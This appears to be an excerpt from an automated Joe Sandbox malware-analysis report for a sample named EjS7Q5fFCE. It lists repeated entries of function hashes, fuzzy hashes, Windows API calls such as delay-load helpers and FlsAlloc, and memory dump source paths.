                                                              • Opcode ID: 6d607926823ffaba69582cbdbf2f4f3f6f5a7f4748bb9a0eb1f28c97bf76cda5
                                                              • Instruction ID: df6e4f9d99da9729da3a24981f46ea189d829e1ab3ee12875b66b94363b1019e
                                                              • Opcode Fuzzy Hash: 6d607926823ffaba69582cbdbf2f4f3f6f5a7f4748bb9a0eb1f28c97bf76cda5
                                                              • Instruction Fuzzy Hash: 93014C72544209BBDF029F91DC01DEE7F66EF0C755F014166FE1425161C63ACA31EB99
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0044A56F), ref: 0044AF55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: db15dafac2aae3f0a0134832ef3f835dd17777628ef36803d8622889bcd131ad
                                                              • Instruction ID: 1162d8b1a09ce964b5621dbdc4b3989834a52f263ee61c57373aa1176ae54602
                                                              • Opcode Fuzzy Hash: db15dafac2aae3f0a0134832ef3f835dd17777628ef36803d8622889bcd131ad
                                                              • Instruction Fuzzy Hash: 5BF0B471685208BBDB029F51DC02D9EBF61EF08752B00407AFC0856261DA359E24DB9E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 6947a7244ecdcfa55025b66580f6b38b6afacba2552937e048b4fabec361b19b
                                                              • Instruction ID: f18b90cd40fdfc04445df0299cd3db554aa98458557e0321ff44413cc0f6f1ee
                                                              • Opcode Fuzzy Hash: 6947a7244ecdcfa55025b66580f6b38b6afacba2552937e048b4fabec361b19b
                                                              • Instruction Fuzzy Hash: 05E05CB0AC030877E3019F25DC02A6EB755DB04723B0000BBFC0053241CD389F1046EE
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 1b086cbb2eedc7674cc9178a9a8b7bd522444e1f0519dad5cebb84b148049941
                                                              • Instruction ID: 6c83740879f17cce4d899331db96a359bb714c622bff005f9f99485ec95ef5a2
                                                              • Opcode Fuzzy Hash: 1b086cbb2eedc7674cc9178a9a8b7bd522444e1f0519dad5cebb84b148049941
                                                              • Instruction Fuzzy Hash: B6B0929525A200FC210821871C46C3B010CC089F16730982FBC01C04C1E848AC05083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 9e2563b7c07d21af87a1ad7ff90112cfd477f30443bc24780487dac47d2a63c6
                                                              • Instruction ID: 68f3f058e9c601761cb7c92809ca6b9d6649e0ec7b0e73840a469a363d8be30c
                                                              • Opcode Fuzzy Hash: 9e2563b7c07d21af87a1ad7ff90112cfd477f30443bc24780487dac47d2a63c6
                                                              • Instruction Fuzzy Hash: F8B0929525A204EC3108618B1846D3B010CC088F16730942FB805C10C1A848AC050A3A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: cdbf1268c8e294c5bc2942ce118b1cc9cd57358563e444c64b1882985a99ae68
                                                              • Instruction ID: 0ae7250c04125bbd4bab88ebbcc761d90c85c0922e24b7606c8e4e331dc3912e
                                                              • Opcode Fuzzy Hash: cdbf1268c8e294c5bc2942ce118b1cc9cd57358563e444c64b1882985a99ae68
                                                              • Instruction Fuzzy Hash: 21B0929125A100EC210866471806D3B010CC089F16730D42FBC05C11C1E848A809093A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: f1b64a246d7d52574e9c230c3c12c40f52b335e6279256cbdc1574afe7175d74
                                                              • Instruction ID: dec129d6c4ee1f7584f620ac67e7b1387dcfbbe5f9b06da469813cc047bd71d9
                                                              • Opcode Fuzzy Hash: f1b64a246d7d52574e9c230c3c12c40f52b335e6279256cbdc1574afe7175d74
                                                              • Instruction Fuzzy Hash: 15B0929125A140EC2108614B1806D3B010DC089F16B30942FBC05C10C1E84CA805093A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 5776c5fe3119546a36552364f983c48540b5509bed0f862a44726da36f575821
                                                              • Instruction ID: ac88868aabee6e590d503d1ac060768b8f296f20e0a4863fb2e70e70bd96dcd3
                                                              • Opcode Fuzzy Hash: 5776c5fe3119546a36552364f983c48540b5509bed0f862a44726da36f575821
                                                              • Instruction Fuzzy Hash: 1FB012E125B240FC3148724B5C06D3B010DC0C8F16B30953FFC05C10C1E84CAC490A3E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 8f5b9381b7bd28cb05c4024d4e75928413ee9f42eaf404150fe22dac5b253cae
                                                              • Instruction ID: c98dd202fa4bef690f51cda748d5a506723a71b585123c80a4561581cc428192
                                                              • Opcode Fuzzy Hash: 8f5b9381b7bd28cb05c4024d4e75928413ee9f42eaf404150fe22dac5b253cae
                                                              • Instruction Fuzzy Hash: 30B012D126B140FC3108718B1C06D3B014DC4C8F16B30943FFC06C10C1E84CAC05093E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 215ded273ddd5a607f14b36a2776c64a3924121515ca99abc283ba609e3ab2dd
                                                              • Instruction ID: 8c9a1bba32f90f7518695eb6cb27f85185be367bae403330b717c0c09ffe51d7
                                                              • Opcode Fuzzy Hash: 215ded273ddd5a607f14b36a2776c64a3924121515ca99abc283ba609e3ab2dd
                                                              • Instruction Fuzzy Hash: A2B0929125A100EC2108A1571806D3B014CC089F16730942FBC05C10C1E948A805093A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: f55e4e42e8c8f512ef9896a714e602d9b494a846c758ca2ede25f44f5fabc058
                                                              • Instruction ID: 80eb3f6cbdf27fcb152bed3492f855fcc88f343f2df2757af6e8600bd7c897c9
                                                              • Opcode Fuzzy Hash: f55e4e42e8c8f512ef9896a714e602d9b494a846c758ca2ede25f44f5fabc058
                                                              • Instruction Fuzzy Hash: 4BB0929125A240FC214862475806D3B010CC088F16730952FB815C11C1A848A8490A3A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 4c000d0f8a603ccef944cbcc232d8f32fc1102136c49afa02b5f69a6d0c4aa46
                                                              • Instruction ID: 6127774796292b3819478daa019a372f3762e1c554aaa3c256900184664fbc8f
                                                              • Opcode Fuzzy Hash: 4c000d0f8a603ccef944cbcc232d8f32fc1102136c49afa02b5f69a6d0c4aa46
                                                              • Instruction Fuzzy Hash: 1BB0929125A100EC210862471946D3B010CC088F16730942FB805C11C1A858A90A093A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: d84a2db33e0da509d74d04442136b3c38795ba61e09881258675da6a37e2ed7b
                                                              • Instruction ID: 44ae5748206ceeaeffd5b4c7fd98d9b26e0cb449a53e8fd721f2965a345a817b
                                                              • Opcode Fuzzy Hash: d84a2db33e0da509d74d04442136b3c38795ba61e09881258675da6a37e2ed7b
                                                              • Instruction Fuzzy Hash: 62B092A125A100FC210865471806D3B010DC089F16730942FBC05C10C1E848A905093A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 17398b48b1478b1893e193504a5bf89e8c397b7f4966f4efbefbbe975e142cd3
                                                              • Instruction ID: 57d26c0fba0473a277328b8a4c84cf3623d53eb7c03992ccd48be38b31ceb4a3
                                                              • Opcode Fuzzy Hash: 17398b48b1478b1893e193504a5bf89e8c397b7f4966f4efbefbbe975e142cd3
                                                              • Instruction Fuzzy Hash: D6B012E125A200FC314875475C06D3B010DC0C8F16B30953FFC05C10C1E84CAD450A3E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: c2f2a5ac5a7e391b37c310c88220d45973a2e8274ded551975a0527f5c925a2d
                                                              • Instruction ID: 98b97327ad6c7b358eec2d3cbb2ac62e8e87807a4f9a56d8b412596588ee2341
                                                              • Opcode Fuzzy Hash: c2f2a5ac5a7e391b37c310c88220d45973a2e8274ded551975a0527f5c925a2d
                                                              • Instruction Fuzzy Hash: 39B012E125A100FC310875471D46D3B010DC0C8F16730943FFC05C10C1EC4CAE06093E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 5b43ee372049f906cab0eea5e75286d396450fe577640793498f432cf3ac4fc3
                                                              • Instruction ID: 994423528572f42f18e5cc2e96c7920854afe4b82d5088955c5afa5f2a92cc5e
                                                              • Opcode Fuzzy Hash: 5b43ee372049f906cab0eea5e75286d396450fe577640793498f432cf3ac4fc3
                                                              • Instruction Fuzzy Hash: CFB012E125A100FC310875471C06D3B010DC0C8F16730943FFC05C10C1E84CAD05093E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043EAF9
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 3Ro
                                                              • API String ID: 1269201914-1492261280
                                                              • Opcode ID: d4004a69718fe9e8fe3ef1a2e85ef569edccb84228dc04c4063ecddf94cc62e5
                                                              • Instruction ID: 90beba6cfb9848f3170c3fd48033ea9bbbfd76181353476a805dfa5fe219a29d
                                                              • Opcode Fuzzy Hash: d4004a69718fe9e8fe3ef1a2e85ef569edccb84228dc04c4063ecddf94cc62e5
                                                              • Instruction Fuzzy Hash: 63B012C629B142BC310872071D42C3B010CC0C5F96730E42FF800C80C2DC8C0D07083E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
